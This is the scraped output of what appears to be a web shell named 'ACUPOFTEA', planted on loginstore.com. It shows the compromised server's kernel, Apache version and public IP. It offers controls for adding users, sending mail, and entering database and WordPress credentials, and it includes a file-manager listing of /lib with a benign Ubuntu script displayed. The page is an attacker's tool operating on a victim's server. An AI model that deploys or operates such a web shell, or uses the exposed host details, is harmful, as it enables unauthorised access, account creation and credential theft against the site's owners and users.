System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
command-not-found
#!/usr/bin/python3 # (c) Zygmunt Krynicki 2005, 2006, 2007, 2008 # Licensed under GPL, see COPYING for the whole text from __future__ import absolute_import, print_function __version__ = "0.3" BUG_REPORT_URL = "https://bugs.launchpad.net/command-not-found/+filebug" try: import sys if sys.path and sys.path[0] == '/usr/lib': # Avoid ImportError noise due to odd installation location. sys.path.pop(0) if sys.version < '3': # We might end up being executed with Python 2 due to an old # /etc/bash.bashrc. import os if "COMMAND_NOT_FOUND_FORCE_PYTHON2" not in os.environ: os.execvp("/usr/bin/python3", [sys.argv[0]] + sys.argv) import gettext import locale from optparse import OptionParser from CommandNotFound.util import crash_guard from CommandNotFound import CommandNotFound except KeyboardInterrupt: import sys sys.exit(127) def enable_i18n(): cnf = gettext.translation("command-not-found", fallback=True) kwargs = {} if sys.version < '3': kwargs["unicode"] = True cnf.install(**kwargs) try: locale.setlocale(locale.LC_ALL, '') except locale.Error: locale.setlocale(locale.LC_ALL, 'C') def fix_sys_argv(encoding=None): """ Fix sys.argv to have only unicode strings, not binary strings. This is required by various places where such argument might be automatically coerced to unicode string for formatting """ if encoding is None: encoding = locale.getpreferredencoding() sys.argv = [arg.decode(encoding) for arg in sys.argv] class LocaleOptionParser(OptionParser): """ OptionParser is broken as its implementation of _get_encoding() uses sys.getdefaultencoding() which is ascii, what it should be using is locale.getpreferredencoding() which returns value based on LC_CTYPE (most likely) and allows for UTF-8 encoding to be used. """ def _get_encoding(self, file): encoding = getattr(file, "encoding", None) if not encoding: encoding = locale.getpreferredencoding() return encoding def main(): enable_i18n() if sys.version < '3': fix_sys_argv() parser = LocaleOptionParser( version=__version__, usage=_("%prog [options] <command-name>")) parser.add_option('-d', '--data-dir', action='store', default="/usr/share/command-not-found", help=_("use this path to locate data fields")) parser.add_option('--ignore-installed', '--ignore-installed', action='store_true', default=False, help=_("ignore local binaries and display the available packages")) parser.add_option('--no-failure-msg', action='store_true', default=False, help=_("don't print '<command-name>: command not found'")) (options, args) = parser.parse_args() if len(args) == 1: try: cnf = CommandNotFound.CommandNotFound(options.data_dir) except FileNotFoundError: print(_("Could not find command-not-found database. Run 'sudo apt update' to populate it."), file=sys.stderr) print(_("%s: command not found") % args[0], file=sys.stderr) return if not cnf.advise(args[0], options.ignore_installed) and not options.no_failure_msg: print(_("%s: command not found") % args[0], file=sys.stderr) if __name__ == "__main__": crash_guard(main, BUG_REPORT_URL, __version__)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-13 04:58:15
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
apache2
DIR
-
drwxr-xr-x
2024-10-23 09:34:19
apparmor
DIR
-
drwxr-xr-x
2025-12-10 03:49:03
apt
DIR
-
drwxr-xr-x
2025-07-26 09:47:32
bfd-plugins
DIR
-
drwxr-xr-x
2024-11-27 09:06:32
binfmt.d
DIR
-
drwxr-xr-x
2026-07-06 04:29:52
byobu
DIR
-
drwxr-xr-x
2024-02-16 06:51:12
cgi-bin
DIR
-
drwxr-xr-x
2024-07-17 06:57:26
cloud-init
DIR
-
drwxr-xr-x
2026-06-02 09:39:13
compat-ld
DIR
-
drwxr-xr-x
2025-12-10 10:22:23
console-setup
DIR
-
drwxr-xr-x
2024-02-16 06:44:18
crda
DIR
-
drwxr-xr-x
2026-08-06 11:37:56
cryptsetup
DIR
-
drwxr-xr-x
2025-03-07 10:20:43
dbus-1.0
DIR
-
drwxr-xr-x
2024-02-16 06:53:05
dpkg
DIR
-
drwxr-xr-x
2024-02-16 06:37:33
dracut
DIR
-
drwxr-xr-x
2026-05-22 03:38:51
environment.d
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
file
DIR
-
drwxr-xr-x
2024-02-16 06:50:33
finalrd
DIR
-
drwxr-xr-x
2024-02-16 06:53:05
firmware
DIR
-
drwxr-xr-x
2026-08-06 11:37:56
gcc
DIR
-
drwxr-xr-x
2024-11-27 09:06:31
girepository-1.0
DIR
-
drwxr-xr-x
2026-04-22 06:55:04
git-core
DIR
-
drwxr-xr-x
2026-02-27 10:28:20
gnupg
DIR
-
drwxr-xr-x
2026-01-08 11:24:09
gnupg2
DIR
-
drwxr-xr-x
2026-01-08 11:24:09
gold-ld
DIR
-
drwxr-xr-x
2025-12-10 10:22:23
groff
DIR
-
drwxr-xr-x
2024-02-16 06:44:46
grub
DIR
-
drwxr-xr-x
2024-03-13 04:17:38
grub-legacy
DIR
-
drwxr-xr-x
2024-03-13 04:17:38
hdparm
DIR
-
drwxr-xr-x
2024-02-16 06:50:34
init
DIR
-
drwxr-xr-x
2024-02-16 06:53:05
initcpio
DIR
-
drwxr-xr-x
2024-02-16 06:44:54
initramfs-tools
DIR
-
drwxr-xr-x
2024-02-16 06:44:55
kernel
DIR
-
drwxr-xr-x
2024-02-16 06:44:25
klibc
DIR
-
drwxr-xr-x
2024-02-16 06:44:56
linux
DIR
-
drwxr-xr-x
2024-03-13 04:18:34
linux-boot-probes
DIR
-
drwxr-xr-x
2024-03-13 04:17:38
locale
DIR
-
drwxr-xr-x
2026-07-27 07:22:44
lsb
DIR
-
drwxr-xr-x
2024-02-16 06:53:06
man-db
DIR
-
drwxr-xr-x
2024-02-16 06:50:37
mecab
DIR
-
drwxr-xr-x
2024-10-23 09:35:45
mime
DIR
-
drwxr-xr-x
2026-07-09 11:17:29
modprobe.d
DIR
-
drwxr-xr-x
2026-08-06 11:37:53
modules
DIR
-
drwxr-xr-x
2026-08-05 11:04:57
modules-load.d
DIR
-
drwxr-xr-x
2026-07-09 08:22:23
multipath
DIR
-
drwxr-xr-x
2024-02-16 06:53:06
mysql
DIR
-
drwxr-xr-x
2026-06-22 05:30:54
nagios
DIR
-
drwxr-xr-x
2024-02-16 06:45:08
needrestart
DIR
-
drwxr-xr-x
2025-10-01 07:10:27
netplan
DIR
-
drwxr-xr-x
2026-05-27 04:41:42
networkd-dispatcher
DIR
-
drwxr-xr-x
2024-02-16 06:44:44
node_modules
DIR
-
drwxr-xr-x
2025-04-08 05:12:47
nvidia
DIR
-
drwxr-xr-x
2026-03-25 08:51:26
open-iscsi
DIR
-
drwxr-xr-x
2025-02-27 10:16:47
openssh
DIR
-
drwxr-xr-x
2026-07-13 04:58:15
os-prober
DIR
-
drwxr-xr-x
2024-03-13 04:17:38
os-probes
DIR
-
drwxr-xr-x
2024-03-13 04:17:38
pam.d
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
php
DIR
-
drwxr-xr-x
2025-04-08 05:12:47
pkgconfig
DIR
-
drwxr-xr-x
2024-02-16 06:53:07
pm-utils
DIR
-
drwxr-xr-x
2024-02-16 06:50:34
policykit-1
DIR
-
drwxr-xr-x
2026-04-15 11:58:41
polkit-1
DIR
-
drwxr-xr-x
2026-04-15 11:58:41
proftpd
DIR
-
drwxr-xr-x
2025-12-01 06:48:06
python2.7
DIR
-
drwxr-xr-x
2024-02-16 06:44:42
python3
DIR
-
drwxr-xr-x
2024-02-16 06:44:22
python3.10
DIR
-
drwxr-xr-x
2026-07-06 04:29:52
python3.11
DIR
-
drwxr-xr-x
2024-02-16 06:50:32
recovery-mode
DIR
-
drwxr-xr-x
2024-02-16 06:50:34
rsyslog
DIR
-
drwxr-xr-x
2026-07-24 11:19:01
sasl2
DIR
-
drwxr-xr-x
2022-12-12 11:52:45
snapd
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
software-properties
DIR
-
drwxr-xr-x
2024-02-16 06:53:43
ssl
DIR
-
drwxr-xr-x
2026-07-30 06:58:27
sysctl.d
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
systemd
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
sysusers.d
DIR
-
drwxr-xr-x
2026-07-09 08:22:23
tc
DIR
-
drwxr-xr-x
2026-07-02 06:05:49
terminfo
DIR
-
drwxr-xr-x
2022-01-17 05:02:04
tmpfiles.d
DIR
-
drwxr-xr-x
2026-07-24 11:19:01
ubiquity
DIR
-
drwxr-xr-x
2024-02-16 06:44:35
ubuntu-advantage
DIR
-
drwxr-xr-x
2026-07-16 07:28:56
ubuntu-release-upgrader
DIR
-
drwxr-xr-x
2026-07-09 08:22:22
udev
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
udisks2
DIR
-
drwxr-xr-x
2025-08-29 11:58:17
ufw
DIR
-
drwxr-xr-x
2024-02-16 06:50:40
update-notifier
DIR
-
drwxr-xr-x
2024-10-14 03:02:29
usrmerge
DIR
-
drwxr-xr-x
2024-02-16 06:53:55
valgrind
DIR
-
drwxr-xr-x
2024-10-14 03:02:25
x86_64-linux-gnu
DIR
-
drwxr-xr-x
2026-07-30 06:58:27
xfsprogs
DIR
-
drwxr-xr-x
2025-01-23 03:44:33
cnf-update-db
text/x-script.python
1.05 KB
-rwxr-xr-x
2021-12-08 10:53:19
command-not-found
text/x-script.python
3.48 KB
-rwxr-xr-x
2021-12-08 10:53:19
cpp
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
klibc-BnzSoOUNgFnGkEcRdekugdBENMs.so
application/x-executable
76.94 KB
-rwxr-xr-x
2026-01-12 02:55:02
libdmmp.so
application/x-sharedlib
38.07 KB
-rw-r--r--
2023-10-31 10:21:59
libdmmp.so.0.2.0
application/x-sharedlib
38.07 KB
-rw-r--r--
2023-10-31 10:21:59
libhandle.so.1
application/x-sharedlib
14.19 KB
-rw-r--r--
2024-10-17 06:49:09
libhandle.so.1.0.3
application/x-sharedlib
14.19 KB
-rw-r--r--
2024-10-17 06:49:09
libmpathcmd.so
application/x-sharedlib
14.07 KB
-rw-r--r--
2023-10-31 10:21:59
libmpathcmd.so.0
application/x-sharedlib
14.07 KB
-rw-r--r--
2023-10-31 10:21:59
libmpathpersist.so
application/x-sharedlib
38.07 KB
-rw-r--r--
2023-10-31 10:21:59
libmpathpersist.so.0
application/x-sharedlib
38.07 KB
-rw-r--r--
2023-10-31 10:21:59
libmultipath.so
application/x-sharedlib
400.07 KB
-rw-r--r--
2023-10-31 10:21:59
libmultipath.so.0
application/x-sharedlib
400.07 KB
-rw-r--r--
2023-10-31 10:21:59
libnetpbm.so.10
application/x-sharedlib
151.04 KB
-rw-r--r--
2021-02-07 06:32:35
libnetpbm.so.10.0
application/x-sharedlib
151.04 KB
-rw-r--r--
2021-02-07 06:32:35
libqdbm.so.14
application/x-sharedlib
272.25 KB
-rw-r--r--
2022-02-06 12:48:27
libqdbm.so.14.14.0
application/x-sharedlib
272.25 KB
-rw-r--r--
2022-02-06 12:48:27
os-release
text/plain
386 B
-rw-r--r--
2024-09-10 11:18:05
sftp-server
application/x-pie-executable
86.27 KB
-rwxr-xr-x
2026-07-09 06:38:00
~ ACUPOFTEA - www.loginstore.com